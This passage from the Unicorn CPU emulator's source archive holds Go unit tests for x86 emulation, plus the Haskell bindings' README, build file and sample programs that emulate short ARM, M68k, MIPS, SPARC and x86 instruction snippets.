X86_INS_VSUBPS = 1290 X86_INS_VSUBSD = 1291 X86_INS_VSUBSS = 1292 X86_INS_VTESTPD = 1293 X86_INS_VTESTPS = 1294 X86_INS_VUNPCKHPD = 1295 X86_INS_VUNPCKHPS = 1296 X86_INS_VUNPCKLPD = 1297 X86_INS_VUNPCKLPS = 1298 X86_INS_VZEROALL = 1299 X86_INS_VZEROUPPER = 1300 X86_INS_WAIT = 1301 X86_INS_WBINVD = 1302 X86_INS_WRFSBASE = 1303 X86_INS_WRGSBASE = 1304 X86_INS_WRMSR = 1305 X86_INS_XABORT = 1306 X86_INS_XACQUIRE = 1307 X86_INS_XBEGIN = 1308 X86_INS_XCHG = 1309 X86_INS_XCRYPTCBC = 1310 X86_INS_XCRYPTCFB = 1311 X86_INS_XCRYPTCTR = 1312 X86_INS_XCRYPTECB = 1313 X86_INS_XCRYPTOFB = 1314 X86_INS_XEND = 1315 X86_INS_XGETBV = 1316 X86_INS_XLATB = 1317 X86_INS_XRELEASE = 1318 X86_INS_XRSTOR = 1319 X86_INS_XRSTOR64 = 1320 X86_INS_XRSTORS = 1321 X86_INS_XRSTORS64 = 1322 X86_INS_XSAVE = 1323 X86_INS_XSAVE64 = 1324 X86_INS_XSAVEC = 1325 X86_INS_XSAVEC64 = 1326 X86_INS_XSAVEOPT = 1327 X86_INS_XSAVEOPT64 = 1328 X86_INS_XSAVES = 1329 X86_INS_XSAVES64 = 1330 X86_INS_XSETBV = 1331 X86_INS_XSHA1 = 1332 X86_INS_XSHA256 = 1333 X86_INS_XSTORE = 1334 X86_INS_XTEST = 1335 X86_INS_FDISI8087_NOP = 1336 X86_INS_FENI8087_NOP = 1337 X86_INS_ENDING = 1338 )unicorn-2.1.1/bindings/go/unicorn/x86_test.go000066400000000000000000000102221467524106700210730ustar00rootroot00000000000000package unicorn import ( "testing" ) var ADDRESS uint64 = 0x1000000 func MakeUc(mode int, code string) (Unicorn, error) { mu, err := NewUnicorn(ARCH_X86, mode) if err != nil { return nil, err } if err := mu.MemMap(ADDRESS, 2*1024*1024); err != nil { return nil, err } if err := 
mu.MemWrite(ADDRESS, []byte(code)); err != nil { return nil, err } if err := mu.RegWrite(X86_REG_ECX, 0x1234); err != nil { return nil, err } if err := mu.RegWrite(X86_REG_EDX, 0x7890); err != nil { return nil, err } return mu, nil } func TestX86(t *testing.T) { code := "\x41\x4a" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { t.Fatal(err) } ecx, _ := mu.RegRead(X86_REG_ECX) edx, _ := mu.RegRead(X86_REG_EDX) if ecx != 0x1235 || edx != 0x788f { t.Fatal("Bad register values.") } } func TestX86InvalidRead(t *testing.T) { code := "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) if err.(UcError) != ERR_READ_UNMAPPED { t.Fatal("Expected ERR_READ_UNMAPPED") } ecx, _ := mu.RegRead(X86_REG_ECX) edx, _ := mu.RegRead(X86_REG_EDX) if ecx != 0x1234 || edx != 0x7890 { t.Fatal("Bad register values.") } } func TestX86InvalidWrite(t *testing.T) { code := "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) if err.(UcError) != ERR_WRITE_UNMAPPED { t.Fatal("Expected ERR_WRITE_UNMAPPED") } ecx, _ := mu.RegRead(X86_REG_ECX) edx, _ := mu.RegRead(X86_REG_EDX) if ecx != 0x1234 || edx != 0x7890 { t.Fatal("Bad register values.") } } func TestX86InOut(t *testing.T) { code := "\x41\xE4\x3F\x4a\xE6\x46\x43" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } var outVal uint64 var inCalled, outCalled bool mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size uint32) uint32 { inCalled = true switch size { case 1: return 0xf1 case 2: return 0xf2 case 4: return 0xf4 default: return 0 } }, 1, 0, X86_INS_IN) mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size, value uint32) { outCalled = true var err error switch size { case 1: outVal, err = mu.RegRead(X86_REG_AL) case 2: outVal, err = mu.RegRead(X86_REG_AX) case 4: outVal, err = mu.RegRead(X86_REG_EAX) } if err != nil { t.Fatal(err) } }, 1, 0, X86_INS_OUT) if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { t.Fatal(err) } if !inCalled || !outCalled { t.Fatal("Ports not accessed.") } if outVal != 0xf1 { t.Fatal("Incorrect OUT value.") } } func TestX86Syscall(t *testing.T) { code := "\x0f\x05" mu, err := MakeUc(MODE_64, code) if err != nil { t.Fatal(err) } mu.HookAdd(HOOK_INSN, func(_ Unicorn) { rax, _ := mu.RegRead(X86_REG_RAX) mu.RegWrite(X86_REG_RAX, rax+1) }, 1, 0, X86_INS_SYSCALL) mu.RegWrite(X86_REG_RAX, 0x100) err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) if err != nil { t.Fatal(err) } v, _ := mu.RegRead(X86_REG_RAX) if v != 0x101 { t.Fatal("Incorrect syscall return value.") } } func TestX86Mmr(t *testing.T) { mu, err := MakeUc(MODE_64, "") if err != nil { t.Fatal(err) } err = mu.RegWriteMmr(X86_REG_GDTR, &X86Mmr{Selector: 0, Base: 0x1000, Limit: 0x1fff, Flags: 0}) if err != nil { t.Fatal(err) } mmr, err := mu.RegReadMmr(X86_REG_GDTR) if mmr.Selector != 0 || mmr.Base != 0x1000 || mmr.Limit != 0x1fff || mmr.Flags != 0 { t.Fatalf("mmr read failed: %#v", mmr) } } func BenchmarkX86Hook(b *testing.B) { // loop rax times code := "\x48\xff\xc8\x48\x83\xf8\x00\x0f\x8f\xf3\xff\xff\xff" mu, err := MakeUc(MODE_64, code) if err != nil { b.Fatal(err) } count := 0 mu.HookAdd(HOOK_CODE, func(_ Unicorn, addr uint64, size uint32) { count++ }, 1, 0) mu.RegWrite(X86_REG_RAX, uint64(b.N)) b.ResetTimer() if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { b.Fatal(err) }
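// After Start returns, rax should have counted down to zero, and the code
// hook should have fired for all three instructions of the loop body
// (dec rax; cmp rax, 0; jg) in each of the b.N iterations, hence the
// b.N*3 expectation checked below.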
rax, _ := mu.RegRead(X86_REG_RAX) if rax != 0 { b.Errorf("benchmark fell short: rax (%d) != 0", rax) } if count != b.N*3 { b.Fatalf("benchmark fell short: %d < %d", count, b.N) } } unicorn-2.1.1/bindings/haskell/000077500000000000000000000000001467524106700164245ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/.gitignore000066400000000000000000000003411467524106700204120ustar00rootroot00000000000000dist cabal-dev *.o *.hi *.chi *.chs.h *.dyn_o *.dyn_hi .virtualenv .hpc .hsenv .cabal-sandbox/ cabal.sandbox.config *.prof *.aux *.hp SampleArm SampleArm64 SampleM68k SampleMips SampleSparc SampleX86 Shellcode SampleBatchReg unicorn-2.1.1/bindings/haskell/README.TXT000066400000000000000000000016241467524106700177650ustar00rootroot00000000000000This documentation explains how to install Haskell binding for Unicorn from source. 0. Install the core engine as dependency Follow README in the root directory to compile & install the core. On *nix, this can simply be done by (project root directory): $ sudo ./make.sh install 1. Change directories into the Haskell bindings, build and install $ cd bindings/haskell $ cabal install If you are installing into a sandbox, run `cabal sandbox init` before installing Unicorn's dependencies. If the build fails, install c2hs manually `cabal install c2hs` (note that this will probably also require you to run `cabal install alex` and `cabal install happy` as well). If you are NOT using a sandbox, ensure that `$HOME/.cabal/bin` is on your PATH. To build a sample (after having built and installed the Haskell bindings) $ cd bindings/haskell $ ghc --make samples/SampleArm.hs unicorn-2.1.1/bindings/haskell/Setup.hs000066400000000000000000000000561467524106700200610ustar00rootroot00000000000000import Distribution.Simple main = defaultMain unicorn-2.1.1/bindings/haskell/samples/000077500000000000000000000000001467524106700200705ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/samples/SampleArm.hs000066400000000000000000000076611467524106700223170ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate ARM code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Arm as Arm import Data.Bits import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- mov r0, #0x37; sub r1, r2, r3 armCode :: BS.ByteString armCode = BS.pack [0x37, 0x00, 0xa0, 0xe3, 0x03, 0x10, 0x42, 0xe0] -- sub sp, #0xc thumbCode :: BS.ByteString thumbCode = BS.pack [0x83, 0xb0] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . 
BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testArm :: IO () testArm = do putStrLn "Emulate ARM code" result <- runEmulator $ do -- Initialize emulator in ARM mode uc <- open ArchArm [ModeArm] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address armCode -- Initialize machine registers regWrite uc Arm.R0 0x1234 regWrite uc Arm.R2 0x6789 regWrite uc Arm.R3 0x3333 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength armCode start uc address (address + codeLen) Nothing Nothing -- Return the results r0 <- regRead uc Arm.R0 r1 <- regRead uc Arm.R1 return (r0, r1) case result of Right (r0, r1) -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> R0 = 0x" ++ showHex r0 putStrLn $ ">>> R1 = 0x" ++ showHex r1 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" testThumb :: IO () testThumb = do putStrLn "Emulate THUMB code" result <- runEmulator $ do -- Initialize emulator in ARM mode uc <- open ArchArm [ModeThumb] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address thumbCode -- Initialize machine registers regWrite uc Arm.Sp 0x1234 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength thumbCode start uc (address .|. 1) (address + codeLen) Nothing Nothing -- Return the results sp <- regRead uc Arm.Sp return sp case result of Right sp -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> SP = 0x" ++ showHex sp Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = do testArm putStrLn "==========================" testThumb unicorn-2.1.1/bindings/haskell/samples/SampleArm64.hs000066400000000000000000000046171467524106700224670ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate ARM64 code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Arm64 as Arm64 import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- add x11, x13, x15 armCode :: BS.ByteString armCode = BS.pack [0xab, 0x01, 0x0f, 0x8b] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . 
BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testArm64 :: IO () testArm64 = do putStrLn "Emulate ARM64 code" result <- runEmulator $ do -- Initialize emulator in ARM64 mode uc <- open ArchArm64 [ModeArm] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address armCode -- Initialize machine registers regWrite uc Arm64.X11 0x1234 regWrite uc Arm64.X13 0x6789 regWrite uc Arm64.X15 0x3333 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength armCode start uc address (address + codeLen) Nothing Nothing -- Return the results x11 <- regRead uc Arm64.X11 return x11 case result of Right x11 -> do -- Now print out some registers putStrLn $ ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> X11 = 0x" ++ showHex x11 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = testArm64 unicorn-2.1.1/bindings/haskell/samples/SampleBatchReg.hs000066400000000000000000000053231467524106700232500ustar00rootroot00000000000000import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.X86 as X86 import Control.Monad.Trans.Class (lift) import qualified Data.ByteString as BS import Data.Int import Data.List (intercalate) import Data.Word import qualified Numeric as N (showHex) import System.IO (hPutStrLn, stderr) syscallABI :: [X86.Register] syscallABI = [ X86.Rax , X86.Rdi , X86.Rsi , X86.Rdx , X86.R10 , X86.R8 , X86.R9 ] vals :: [Int64] vals = [ 200 , 10 , 11 , 12 , 13 , 14 , 15 ] ucPerror :: Error -> IO () ucPerror err = hPutStrLn stderr $ "Error: " ++ strerror err base :: Word64 base = 0x10000 -- mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov r9, 6; syscall code :: BS.ByteString code = BS.pack [ 0x48, 0xc7, 0xc0, 0x64, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc7 , 0x01, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x02, 0x00, 0x00 , 0x00, 0x48, 0xc7, 0xc2, 0x03, 0x00, 0x00, 0x00, 0x49, 0xc7 , 0xc2, 0x04, 0x00, 0x00, 0x00, 0x49, 0xc7, 0xc0, 0x05, 0x00 , 0x00, 0x00, 0x49, 0xc7, 0xc1, 0x06, 0x00, 0x00, 0x00, 0x0f , 0x05 ] -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex i = N.showHex (fromIntegral i :: Word64) "" -- Write a string (with a newline character) to standard output in the emulator emuPutStrLn :: String -> Emulator () emuPutStrLn = lift .
putStrLn hookSyscall :: SyscallHook () hookSyscall uc _ = do runEmulator $ do readVals <- regReadBatch uc syscallABI emuPutStrLn $ "syscall: {" ++ intercalate ", " (map show readVals) ++ "}" return () hookCode :: CodeHook () hookCode _ addr size _ = do putStrLn $ "HOOK_CODE: 0x" ++ showHex addr ++ ", 0x" ++ maybe "0" showHex size main :: IO () main = do result <- runEmulator $ do uc <- open ArchX86 [Mode64] -- regWriteBatch emuPutStrLn "regWriteBatch {200, 10, 11, 12, 13, 14, 15}" regWriteBatch uc syscallABI vals readVals <- regReadBatch uc syscallABI emuPutStrLn $ "regReadBatch = {" ++ intercalate ", " (map show readVals) ++ "}" -- syscall emuPutStrLn "running syscall shellcode" syscallHookAdd uc hookSyscall () 1 0 memMap uc base (0x1000) [ProtAll] memWrite uc base code let codeLen = fromIntegral $ BS.length code start uc base (base + codeLen) Nothing Nothing case result of Right _ -> return () Left err -> ucPerror err unicorn-2.1.1/bindings/haskell/samples/SampleM68k.hs000066400000000000000000000107531467524106700223210ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate m68k code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.M68k as M68k import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- movq #-19, %d3 m68kCode :: BS.ByteString m68kCode = BS.pack [0x76, 0xed] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testM68k :: IO () testM68k = do putStrLn "Emulate M68K code" result <- runEmulator $ do -- Initialize emulator in M68K mode uc <- open ArchM68k [ModeBigEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address m68kCode -- Initialize machine registers regWrite uc M68k.D0 0x0000 regWrite uc M68k.D1 0x0000 regWrite uc M68k.D2 0x0000 regWrite uc M68k.D3 0x0000 regWrite uc M68k.D4 0x0000 regWrite uc M68k.D5 0x0000 regWrite uc M68k.D6 0x0000 regWrite uc M68k.D7 0x0000 regWrite uc M68k.A0 0x0000 regWrite uc M68k.A1 0x0000 regWrite uc M68k.A2 0x0000 regWrite uc M68k.A3 0x0000 regWrite uc M68k.A4 0x0000 regWrite uc M68k.A5 0x0000 regWrite uc M68k.A6 0x0000 regWrite uc M68k.A7 0x0000 regWrite uc M68k.Pc 0x0000 regWrite uc M68k.Sr 0x0000 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instruction codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength m68kCode start uc address (address + codeLen) Nothing Nothing -- Return the results d0 <- regRead uc M68k.D0 d1 <- regRead uc M68k.D1 d2 <- regRead uc M68k.D2 d3 <- regRead uc M68k.D3 d4 <- regRead uc M68k.D4 d5 <- regRead uc M68k.D5 d6 <- regRead uc M68k.D6 d7 <- regRead uc M68k.D7 a0 <- regRead uc M68k.A0 a1 <- regRead uc M68k.A1 a2 <- regRead uc M68k.A2 a3 <- regRead uc M68k.A3 a4 <- regRead uc M68k.A4 a5 <- regRead uc M68k.A5 a6 
<- regRead uc M68k.A6 a7 <- regRead uc M68k.A7 pc <- regRead uc M68k.Pc sr <- regRead uc M68k.Sr return (d0, d1, d2, d3, d4, d5, d6, d7, a0, a1, a2, a3, a4, a5, a6, a7, pc, sr) case result of Right (d0, d1, d2, d3, d4, d5, d6, d7, a0, a1, a2, a3, a4, a5, a6, a7, pc, sr) -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> A0 = 0x" ++ showHex a0 ++ "\t\t>>> D0 = 0x" ++ showHex d0 putStrLn $ ">>> A1 = 0x" ++ showHex a1 ++ "\t\t>>> D1 = 0x" ++ showHex d1 putStrLn $ ">>> A2 = 0x" ++ showHex a2 ++ "\t\t>>> D2 = 0x" ++ showHex d2 putStrLn $ ">>> A3 = 0x" ++ showHex a3 ++ "\t\t>>> D3 = 0x" ++ showHex d3 putStrLn $ ">>> A4 = 0x" ++ showHex a4 ++ "\t\t>>> D4 = 0x" ++ showHex d4 putStrLn $ ">>> A5 = 0x" ++ showHex a5 ++ "\t\t>>> D5 = 0x" ++ showHex d5 putStrLn $ ">>> A6 = 0x" ++ showHex a6 ++ "\t\t>>> D6 = 0x" ++ showHex d6 putStrLn $ ">>> A7 = 0x" ++ showHex a7 ++ "\t\t>>> D7 = 0x" ++ showHex d7 putStrLn $ ">>> PC = 0x" ++ showHex pc putStrLn $ ">>> SR = 0x" ++ showHex sr Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = testM68k unicorn-2.1.1/bindings/haskell/samples/SampleMips.hs000066400000000000000000000075461467524106700225120ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate Mips code (big endian) import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Mips as Mips import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- ori $at, $at, 0x3456 mipsCodeEb :: BS.ByteString mipsCodeEb = BS.pack [0x34, 0x21, 0x34, 0x56] -- ori $at, $at, 0x3456 mipsCodeEl :: BS.ByteString mipsCodeEl = BS.pack [0x56, 0x34, 0x21, 0x34] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testMipsEb :: IO () testMipsEb = do putStrLn "Emulate MIPS code (big-endian)" result <- runEmulator $ do -- Initialize emulator in MIPS mode uc <- open ArchMips [ModeMips32, ModeBigEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address mipsCodeEb -- Initialise machine registers regWrite uc Mips.Reg1 0x6789 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength mipsCodeEb start uc address (address + codeLen) Nothing Nothing -- Return the results r1 <- regRead uc Mips.Reg1 return r1 case result of Right r1 -> do -- Now print out some registers putStrLn ">>> Emulation done. 
Below is the CPU context" putStrLn $ ">>> R1 = 0x" ++ showHex r1 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" testMipsEl :: IO () testMipsEl = do putStrLn "===========================" putStrLn "Emulate MIPS code (little-endian)" result <- runEmulator $ do -- Initialize emulator in MIPS mode uc <- open ArchMips [ModeMips32, ModeLittleEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address mipsCodeEl -- Initialize machine registers regWrite uc Mips.Reg1 0x6789 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength mipsCodeEl start uc address (address + codeLen) Nothing Nothing -- Return the results r1 <- regRead uc Mips.Reg1 return r1 case result of Right r1 -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> R1 = 0x" ++ showHex r1 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = do testMipsEb testMipsEl unicorn-2.1.1/bindings/haskell/samples/SampleSparc.hs000066400000000000000000000046071467524106700226450ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate Sparc code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Sparc as Sparc import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- add %g1, %g2, %g3 sparcCode :: BS.ByteString sparcCode = BS.pack [0x86, 0x00, 0x40, 0x02] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testSparc :: IO () testSparc = do putStrLn "Emulate SPARC code" result <- runEmulator $ do -- Initialize emulator in Sparc mode uc <- open ArchSparc [ModeSparc32, ModeBigEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address sparcCode -- Initialize machine registers regWrite uc Sparc.G1 0x1230 regWrite uc Sparc.G2 0x6789 regWrite uc Sparc.G3 0x5555 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions with customized callback codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength sparcCode start uc address (address + codeLen) Nothing Nothing -- Return results g3 <- regRead uc Sparc.G3 return g3 case result of Right g3 -> do -- Now print out some registers putStrLn ">>> Emulation done. 
Below is the CPU context" putStrLn $ ">>> G3 = 0x" ++ showHex g3 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = testSparc unicorn-2.1.1/bindings/haskell/samples/SampleX86.hs000066400000000000000000000607511467524106700221640ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate X86 code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.X86 as X86 import Control.Monad.Trans.Class (lift) import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) import System.Environment -- Code to be emulated -- -- inc ecx; dec edx x86Code32 :: BS.ByteString x86Code32 = BS.pack [0x41, 0x4a] -- jmp 4; nop; nop; nop; nop; nop; nop x86Code32Jump :: BS.ByteString x86Code32Jump = BS.pack [0xeb, 0x02, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90] -- inc ecx; dec edx; jmp self-loop x86Code32Loop :: BS.ByteString x86Code32Loop = BS.pack [0x41, 0x4a, 0xeb, 0xfe] -- mov [0xaaaaaaaa], ecx; inc ecx; dec edx x86Code32MemWrite :: BS.ByteString x86Code32MemWrite = BS.pack [0x89, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] -- mov ecx, [0xaaaaaaaa]; inc ecx; dec edx x86Code32MemRead :: BS.ByteString x86Code32MemRead = BS.pack [0x8b, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] -- jmp ouside; inc ecx; dec edx x86Code32JmpInvalid :: BS.ByteString x86Code32JmpInvalid = BS.pack [0xe9, 0xe9, 0xee, 0xee, 0xee, 0x41, 0x4a] -- inc ecx; in al, 0x3f; dec edx; out 0x46, al; inc ebx x86Code32InOut :: BS.ByteString x86Code32InOut = BS.pack [0x41, 0xe4, 0x3f, 0x4a, 0xe6, 0x46, 0x43] -- inc eax x86Code32Inc :: BS.ByteString x86Code32Inc = BS.pack [0x40] x86Code64 :: BS.ByteString x86Code64 = BS.pack [0x41, 0xbc, 0x3b, 0xb0, 0x28, 0x2a, 0x49, 0x0f, 0xc9, 0x90, 0x4d, 0x0f, 0xad, 0xcf, 0x49, 0x87, 0xfd, 0x90, 0x48, 0x81, 0xd2, 0x8a, 0xce, 0x77, 0x35, 0x48, 0xf7, 0xd9, 0x4d, 0x29, 0xf4, 0x49, 0x81, 0xc9, 0xf6, 0x8a, 0xc6, 0x53, 0x4d, 0x87, 0xed, 0x48, 0x0f, 0xad, 0xd2, 0x49, 0xf7, 0xd4, 0x48, 0xf7, 0xe1, 0x4d, 0x19, 0xc5, 0x4d, 0x89, 0xc5, 0x48, 0xf7, 0xd6, 0x41, 0xb8, 0x4f, 0x8d, 0x6b, 0x59, 0x4d, 0x87, 0xd0, 0x68, 0x6a, 0x1e, 0x09, 0x3c, 0x59] -- add byte ptr [bx + si], al x86Code16 :: BS.ByteString x86Code16 = BS.pack [0x00, 0x00] -- SYSCALL x86Code64Syscall :: BS.ByteString x86Code64Syscall = BS.pack [0x0f, 0x05] -- Memory address where emulation starts address :: Word64 address = 0x1000000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex i = N.showHex (fromIntegral i :: Word64) "" -- Pretty-print byte string as hex showHexBS :: BS.ByteString -> String showHexBS = concatMap (flip N.showHex "") . reverse . BS.unpack -- Write a string (with a newline character) to standard output in the emulator emuPutStrLn :: String -> Emulator () emuPutStrLn = lift . putStrLn -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . 
BS.length -- Callback for tracing basic blocks hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) -- Callback for tracing instruction hookCode :: CodeHook () hookCode uc addr size _ = do runEmulator $ do emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ maybe "0" showHex size eflags <- regRead uc X86.Eflags emuPutStrLn $ ">>> --- EFLAGS is 0x" ++ showHex eflags return () -- Callback for tracing instruction hookCode64 :: CodeHook () hookCode64 uc addr size _ = do runEmulator $ do rip <- regRead uc X86.Rip emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) emuPutStrLn $ ">>> RIP is 0x" ++ showHex rip return () -- Callback for tracing memory access (READ or WRITE) hookMemInvalid :: MemoryEventHook () hookMemInvalid uc MemWriteUnmapped addr size (Just value) _ = do runEmulator $ do emuPutStrLn $ ">>> Missing memory is being WRITE at 0x" ++ showHex addr ++ ", data size = " ++ show size ++ ", data value = 0x" ++ showHex value memMap uc 